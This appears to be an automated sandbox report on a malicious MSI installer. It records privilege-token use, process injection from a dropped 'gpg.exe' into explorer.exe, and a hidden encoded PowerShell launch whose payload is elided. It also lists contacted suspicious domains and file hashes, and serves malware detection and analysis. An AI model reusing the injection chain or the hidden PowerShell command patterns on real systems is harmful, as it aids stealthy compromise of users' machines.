File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4644 set thread context of 2360 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIA87B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8C35.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8DFC.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8E99.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e5786b4.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF8052F16E79F1A722.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5786b8.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF0C7C39F01A3AA06F.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF61814C6C9DBA5244.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5786b4.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8AFB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8C15.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF829D7DB7C59C582F.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{40687992-D47D-43B1-8A2C-57D30E7D9D88} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8760.tmp C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3476 wrote to memory of 3384 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3476 wrote to memory of 3384 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3476 wrote to memory of 3384 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3384 wrote to memory of 2528 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3384 wrote to memory of 2528 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3384 wrote to memory of 2528 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3476 wrote to memory of 4644 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 3476 wrote to memory of 4644 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 3476 wrote to memory of 4644 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 4644 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 4644 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 4644 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 4644 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 2360 wrote to memory of 4656 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 4656 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 1648 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe
PID 2360 wrote to memory of 1648 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe
PID 2360 wrote to memory of 2780 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 2360 wrote to memory of 2780 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 2360 wrote to memory of 2780 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 2360 wrote to memory of 2780 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 2360 wrote to memory of 2780 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 3F99D94B248A7DE3803C63D3E3377CF1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss8FA0.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi8F9D.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr8F9E.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr8F9F.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e [encoded command elided]

C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2360 -ip 2360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 2192

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2360 -ip 2360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 2208

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2360 -ip 2360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 2236

Network

Country Destination Domain Proto
US 8.8.8.8:53 thecurl.monster udp
US 172.67.176.123:80 thecurl.monster tcp
US 172.67.176.123:443 thecurl.monster tcp
US 172.67.151.174:80 death1488.com tcp
GB 93.93.131.124:443 the.earth.li tcp
US 8.8.8.8:53 curlhub.monster udp
US 172.67.204.219:443 curlhub.monster tcp
US 8.8.8.8:53 219.204.67.172.in-addr.arpa udp
US 8.8.8.8:53 11.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 raur94.com udp
US 172.67.195.205:80 raur94.com tcp
US 172.67.195.205:443 raur94.com tcp
US 104.21.2.229:443 checkass.monster tcp
US 8.8.8.8:53 35.206.58.216.in-addr.arpa udp

Files

C:\Windows\Installer\MSI8760.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSI8E99.tmp

MD5 fb4665320c9da54598321c59cc5ed623
SHA1 89e87b3cc569edd26b5805244cfacb2f9c892bc7
SHA256 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59
SHA512 b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jdfd43f3.cmu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\pss8FA0.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

C:\Users\Admin\AppData\Local\Temp\scr8F9E.ps1

MD5 753240f3d0c58563dcba1244db69b0d7
SHA1 4a0f248fccc2431ece50f717cbf80f6681504932
SHA256 e77dbd670eaa228e96cb8ab002b0aa7f55a78779fb58754436ec691e6de14e5a
SHA512 03987837557d6342280d7871b19472e7c05cabc203824081f6fff38083ecef2da8135642644b598b21ee294816d1ed22d0573db04e5c739b2b08c28f7c441ae9

C:\Users\Admin\AppData\Local\Temp\msi8F9D.txt

MD5 eb0046beb949b23b97dccd59c4b8f131
SHA1 c084a9c15a323cd51d24122681a494e52577487f
SHA256 b6594a624b47bcac9a314993f15693e5da2a747adeccff4a996f4ab4491d5467
SHA512 8dfdbf11e27242ab14b0997637a9c3deb47d345183c306e0a9b6d62099f4b341dec49f8369bec7ef839e4003d8c7a86267646c9f7c28b8fe9456c3c69b2aeab0

C:\Config.Msi\e5786b7.rbs

MD5 31b2be250bc4c946918c24bca8f8aa92
SHA1 82ca9c2f47b796497cb7aa67021a7d7cf3c80a15
SHA256 307ebb2baaee3f92b260173205ecd3c78f141c9ea0a7196c60ea5deb01768462
SHA512 2ed84f9fc823d97311cd0b5f58a710c2ca81d31d414c871fce3440b0b658df9a939256f1bd7560af306ba43ea50254a7374795ed6e229ebbb61050493ad84eef

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

MD5 35365d3713500bde4e2e1422c54f04fa
SHA1 0b24b1de060caa7be51404d82da5fef05958a1da
SHA256 5f7e7bb9b2e73abda7e46bfb8b266dbbb7fd3b87ebb253d842ffcfb56f1efe19
SHA512 3e276b947220e56da8798245e9e7a16c9899a3842658ef409518968b137474cba7f13955287d1ff2fa7f929dc3ce75a8fd4c1f5fe58e6edb9e89986080aad375

C:\Windows\Installer\e5786b4.msi

MD5 86a68878633d570e195609fe33640561
SHA1 5a5355a80750693493c4ff9d4184d3234ad62b73
SHA256 7a5d8ef1b6de2d300a6a3118426562e881577c85ab2d919f0337e4de0e9aaa92
SHA512 502f996aff0273aecd4256bd25b3bcd2187a2b44c1b26c0b64a622ae2d788328d8f8e9bbd8fa9119a0edb282d1737f8f502ecf69484a70b14fd287442630c1a9

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgcrypt-20.dll

MD5 f74e6b15bbb4d3a8decb9fe17175d056
SHA1 20a67c7d020bce3adcbd34cb0044771ae0bcb2ba
SHA256 50235ec9328d759d9adceb1224999bcf5d602594b2c6260c4f793b84c533e6d3
SHA512 5c896a916537cbf6e4f6c995a240b3e651356e5a5fc549058cc60892c5905e64a3fd78cf0998149ca88f474f9ce78c94ea398bd245735a1b242f497adb44bbf4

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libassuan-0.dll

MD5 a2dd12a8ecef27ca0e524e9bb4bdb8f5
SHA1 a4f5718c8bc1cc1fba49332d767ad296f7156dbc
SHA256 e54d43ae67352ceb170ece1fc1a219de9baf70cb71c1bf85a6c52858e2ca0ada
SHA512 b35101d5454db885e4f47333365f3d3ce6ed20b94fb75f6965c6e04116967fb5179abaff92a2c20d47b634e81f5ac53e5e1f3def570dd95ae66a3663c0b1ea2c

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libnpth-0.dll

MD5 b7b148054a2818699d93f96139b4d0d0
SHA1 0a5187b37bd84c19a7d2d84f328fa0adbc75123c
SHA256 25fb8e6bb4ebd62bfa478691261ea2e9486020ef52084dad0fc5ea417338d915
SHA512 4f9938a2fb9f6c81cf0dc5d98ecda955e101b5fd52cc43fd58f0072f5ed914c0ef966cd0666c3bcc32f70d52847a5caedea40de86db28c94c8ebd35b366552c1

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\zlib1.dll

MD5 8f4cdaed2399204619310cd76fd11056
SHA1 0f06ef5acde4f1e99a12cfc8489c1163dba910d1
SHA256 df14c4dcb9793a1298c3ef531299479c8bea32a9e8124355e6d3ba6b15416213
SHA512 3d1e0453f10bece7b65fee3806bce9e36e2c526daa72d66774ed47684a591a978a80894b1643709e76db0adcf6f2dca189aa6413786a9b70c742ceaeec5b80dc

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libsqlite3-0.dll

MD5 0381964390751461a5d79d26ca7cedaa
SHA1 3b17b9dca5060f9b22920737165a6bd1de5e8941
SHA256 7b307806698bfe2b8a81cf0d04cfd0df4a9916cba30707ce3934b9ee06bd75da
SHA512 381e6c2d49016ca2c4435526eb2ac4997f0c43c9bbe3ce56bc0ade3b5cc14677101c1297bbf2a10cec16242124a9246ca5e46003512719dc8360af007fb79b05

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgpg-error-0.dll

MD5 72498f59c8c580707a0a3839c332f51b
SHA1 fb09b912912610d243066cc8b71435f689e6a449
SHA256 51b69b17a15a4c8df35e81b9eef8b3c8eb914e8208f0ebbe9713661583cddf4d
SHA512 116956f25484e01236e5aaac2693e78dbc98e47580ac535a49582e21d69602be23f53f45945b0e94b2b0cf2825832a3e1c1f647302bd7b8398794f5579a0e022

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f2460fed3060a114d76eb39c96163832
SHA1 0d94b2e590f03bd1dacd12d539288d5ba578db6a
SHA256 7562977b161dd9dc5d6bb23fc57358af12b7c7c0f435b648fe0befa1699253eb
SHA512 a97039de7444650ba177b93c84a47a418aa5c0b7387ba3bdf2203563556b41d951e7393c965cc012e0b7e11c048c0671c6f366bd8fef1cd0cdf390d0ea44af24

C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe

MD5 a9c5924063a253f64fb86bc924be6996
SHA1 c39ba1e011318b3edf295d4bdde3d56b5de89972
SHA256 eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4
SHA512 57f0f5e8fa907d92feb6175ab32253bfef9f6acf25e5ce3273f12fd428e76a07ec7c8fc007dc2c13dc0c6841222d8874fb7e362d7cbe70f287583782cd3d311e
